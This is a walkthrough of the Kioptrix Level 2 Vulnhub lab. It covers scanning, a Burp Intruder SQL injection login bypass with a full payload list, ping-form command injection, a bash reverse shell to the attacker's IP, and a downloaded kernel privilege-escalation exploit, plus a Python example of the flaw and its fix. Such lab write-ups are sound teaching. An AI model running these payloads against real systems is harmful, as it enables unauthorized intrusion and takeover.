
Kioptrix Level 2 Vulnhub Walkthrough

Machine Info

  • Difficulty: Easy
  • Goal: Gain root access

Network Scanning

Netdiscover

We run netdiscover to find the target's IP address on the host-only adapter interface (eth1).

# Kali linux terminal
netdiscover -i eth1

[Screenshot: netdiscover output]

Nmap

We run nmap with the aggressive scan option (-A) against all ports (-p-) to discover the open ports and services on the target machine.

# Kali linux terminal
nmap -p- -A 192.168.56.111

[Screenshots: nmap scan results]

Enumeration

Enumerating HTTP Service

The nmap scan returns several open ports and services. We start with the HTTP service on port 80 and browse to the website to see what it looks like. We find a login page, so the first thing we do is view the page source, but nothing in it looks interesting. We also try some default credentials such as admin:admin and admin:password, but none of them work.

[Screenshots: the website and its login page]

Exploitation

SQL Injection

We decide to try SQL injection. We enter any username and password (such as test:12345), launch Burp Suite to intercept the request, and send the request to Intruder. We mark the two parameters (uname and psw) as payload positions so their values are replaced with SQL payloads, and set the attack type to Cluster bomb so that every combination of username and password payloads is tried.

[Screenshots: the login page and the intercepted request in Burp Suite]

We copy the SQL payloads below and paste them into payload set 1 and payload set 2.

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

[Screenshot: payload sets loaded into Intruder]

After that, we start the attack; several of the payloads succeed and we are logged in.

[Screenshot: Intruder results showing the successful payloads]

We select one of the successful payloads (such as username: admin'# and password: '_') and use it to log in.

[Screenshot: successful login]

After logging in, we reach a page that executes a ping command against the address entered in its text field.

# Website text field
127.0.0.1

[Screenshots: the ping page and its output]

We try to leverage this command execution to run another command after the ping command, and we succeed in executing the id command once ping has finished.

# Website text field
127.0.0.1; id

[Screenshots: the chained command and the output of id]
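The chained command works because the form pastes the submitted address into a shell command line. The Python below is an added example, not code from the original post or from the Kioptrix application (whose server-side language the post does not state); the function names are hypothetical. It places the flawed pattern beside a validated, shell-free version and a simple detection check on the submitted value.

```python
import ipaddress
import subprocess

# Constructed sample inputs: the value the form expects, and the chained
# value used in the walkthrough above.
BENIGN_INPUT = "127.0.0.1"
CHAINED_INPUT = "127.0.0.1; id"

# Characters that only mean something when a shell parses the command line.
SHELL_METACHARACTERS = set(";&|`$()<>\n")

def vulnerable_command(target: str) -> str:
    """Flawed pattern: user input pasted into a shell command string. When
    this string is handed to a shell, the ';' terminates ping and whatever
    follows runs as a second command."""
    return f"ping -c 1 {target}"

def looks_like_injection(target: str) -> bool:
    """Detection aid for logging/alerting: a plain address never needs
    shell metacharacters."""
    return any(ch in SHELL_METACHARACTERS for ch in target)

def validate_target(target: str) -> str:
    """Allow-list check: the value must parse as a literal IPv4/IPv6
    address; anything else (hostnames included) is rejected."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {target!r}") from exc

def safe_ping_argv(target: str) -> list[str]:
    """Hardened pattern: validate, then build an argv list. No shell is
    involved, so ';' and friends are inert bytes inside one argument."""
    return ["ping", "-c", "1", validate_target(target)]

def is_rejected(target: str) -> bool:
    """True when the validator refuses the value (nothing is executed)."""
    try:
        safe_ping_argv(target)
    except ValueError:
        return True
    return False

def run_ping(target: str) -> subprocess.CompletedProcess:
    """Execute the hardened command (requires a local ping binary)."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=10)
```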

Therefore, we can exploit this command execution to obtain a reverse shell. We open a listener in another terminal, waiting for the reverse shell on port 4444, and receive a shell as the apache user.

# Kali linux terminal
nc -nlvp 4444
id

# Website text field
127.0.0.1; bash -i >& /dev/tcp/192.168.56.101/4444 0>&1

[Screenshot: reverse shell received as the apache user]

Post Exploitation

Privilege Escalation

After obtaining a shell on the target machine as the apache user, we need to escalate our privileges to root. We check the target's kernel version and find it is 2.6.9.

# Target terminal
uname -a
lsb_release -a

[Screenshot: kernel version output]

We use searchsploit to look for available privilege escalation exploits for that version. After trying several of them, we reach 9545.c, which works for us.

# Kali linux terminal
searchsploit linux kernel centos
searchsploit -m linux/local/9545.c

[Screenshot: searchsploit results and 9545.c]

Finally, we obtain a root shell on the target machine.

# Kali linux terminal
python -m SimpleHTTPServer

# Target terminal
cd /tmp
wget http://192.168.56.157:8000/9545.c
gcc 9545.c -o 9545
./9545

[Screenshot: root shell]

This post is licensed under CC BY 4.0 by the author.